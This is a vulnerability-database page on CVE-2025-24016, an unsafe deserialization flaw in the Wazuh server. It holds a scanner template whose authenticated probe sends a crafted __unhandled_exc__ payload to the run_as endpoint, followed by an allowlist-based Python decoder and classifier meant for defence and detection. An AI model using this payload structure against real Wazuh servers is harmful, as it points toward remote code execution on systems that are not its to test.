| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Wazuh | 13 Feb 2025 06:38 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 13 Jul 2025 23:56 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 10 Jun 2025 18:54 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 16 Feb 2025 11:01 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 10 Jun 2025 21:07 | – | githubexploit |
| CVE-2025-24016 | 10 Feb 2025 00:00 | – | attackerkb |
| The vulnerability of the "as_wazuh_object" function in the Wazuh intrusion detection and prevention system allows a perpetrator to execute arbitrary code. | 12 Feb 2025 00:00 | – | bdu_fstec |
| CVE-2025-24016 | 10 Feb 2025 17:01 | – | circl |
| Wazuh Server Deserialization of Untrusted Data Vulnerability | 10 Jun 2025 00:00 | – | cisa_kev |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 10 Jun 2025 12:00 | – | cisa |
```yaml
id: CVE-2025-24016

info:
  name: Wazuh - Unsafe Deserialization Remote Code Execution
  author: Hüseyin TINTAŞ,ritikchaddha
  severity: critical
  description: |
    A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI, where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
  impact: |
    Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and potential denial of service conditions.
  remediation: |
    Upgrade to Wazuh version >= 4.9.1, where this vulnerability has been patched. If an immediate upgrade is not possible: restrict API access to trusted IP addresses only, implement network segmentation to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider implementing a Web Application Firewall (WAF) to filter malicious requests.
  reference:
    - https://github.com/MuhammadWaseem29/CVE-2025-24016
    - https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24016
  classification:
    epss-score: 0.92579
    epss-percentile: 0.99814
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-24016
    cwe-id: CWE-502
    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wazuh
    product: wazuh
    shodan-query: title:"Wazuh"
    fofa-query: app="Wazuh"
  tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev,vuln

flow: http(1) && http(2)

variables:
  payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'

http:
  # Request 1: baseline fetch; the internal negative matcher makes sure the
  # string "NameError" does not already appear on the default page.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "NameError"
        negative: true
        internal: true

  # Request 2: authenticated probe; a 500 whose body names the unresolved
  # class via NameError indicates the unpatched deserializer.
  - raw:
      - |
        POST /security/user/authenticate/run_as HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: Basic {{base64(username + ':' + password)}}

        {{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NameError"

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100d4e57457296c5d16df655cc0470076811726cd8aa99c26c464ea33cb0d10c9ee022100dd484bca54bed26460ea6bd5005bcf3d1650700f90ecef73822d543a49b2ec04:922c64590222798bb761d5b6d8e72950
```
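The template above relies on the deserializer resolving an arbitrary `__class__` name, which is what surfaces the NameError. As an added example that is neither Wazuh's code nor part of the template, the following shows the defensive counterpart: a JSON `object_hook` that rebuilds `__unhandled_exc__` envelopes only from an allowlisted set of exception classes with scalar arguments, plus a small classifier a detection pipeline could run over request bodies. The allowlist, `UnsafePayload`, `decode_dapi_message`, `classify` and the sample bodies are assumptions constructed for this illustration.

```python
import json

# Added illustration, not Wazuh's code: a restrictive object_hook for the
# "__unhandled_exc__" envelope that the probe above targets. The allowlist is
# a constructed sample; a real deployment would enumerate the exception types
# the DistributedAPI actually exchanges. An unknown "__class__" is refused
# before any name lookup happens, so NotARealClass can no longer surface a
# NameError from the interpreter.
ALLOWED_EXCEPTIONS = {
    "ValueError": ValueError,
    "KeyError": KeyError,
    "PermissionError": PermissionError,
    "TimeoutError": TimeoutError,
}
JSON_SCALARS = (str, int, float, bool, type(None))

class UnsafePayload(ValueError):
    """Envelope outside the allowed shape (class not allowlisted, bad args)."""

def as_safe_wazuh_object(dct: dict) -> object:
    """Rebuild an exception only from an allowlisted class and scalar args."""
    if "__unhandled_exc__" not in dct:
        return dct  # ordinary mapping: pass through untouched
    exc = dct["__unhandled_exc__"]
    if not isinstance(exc, dict) or set(exc) != {"__class__", "__args__"}:
        raise UnsafePayload("malformed __unhandled_exc__ envelope")
    cls = ALLOWED_EXCEPTIONS.get(exc["__class__"])
    if cls is None:
        raise UnsafePayload(f"exception class not allowed: {exc['__class__']!r}")
    args = exc["__args__"]
    if not isinstance(args, list) or not all(isinstance(a, JSON_SCALARS) for a in args):
        raise UnsafePayload("__args__ must be a list of JSON scalars")
    return cls(*args)

def decode_dapi_message(raw: str) -> object:
    """Decode a DAPI-style JSON message with the restrictive hook."""
    return json.loads(raw, object_hook=as_safe_wazuh_object)

def classify(raw: str) -> str:
    """Label a request body for a detection pipeline: ok / rejected / invalid-json."""
    try:
        decode_dapi_message(raw)
        return "ok"
    except UnsafePayload:
        return "rejected"
    except json.JSONDecodeError:
        return "invalid-json"

# Constructed samples: the template's probe body and a benign envelope.
PROBE_BODY = '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
BENIGN_BODY = '{"__unhandled_exc__":{"__class__": "ValueError", "__args__": ["bad id"]}}'
```

Running `classify` over API request bodies gives a cheap signal for the monitoring the remediation text recommends: a "rejected" verdict on the run_as endpoint is worth an alert even on a patched server.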